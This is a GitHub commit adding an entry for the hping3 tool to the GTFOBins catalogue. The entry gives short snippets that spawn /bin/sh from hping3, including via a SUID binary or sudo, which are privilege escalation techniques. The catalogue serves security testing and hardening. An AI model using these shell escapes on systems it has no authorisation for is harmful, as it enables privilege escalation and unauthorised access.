Add hping3

This commit is contained in:
makikvues 2020-12-30 08:47:47 +01:00 committed by GitHub
parent 2746e78a44
commit 1c07880178
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

15
_gtfobins/hping3.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
hping3
/bin/sh
suid:
- code: |
./hping3
/bin/sh
sudo:
- code: |
sudo hping3
/bin/sh
---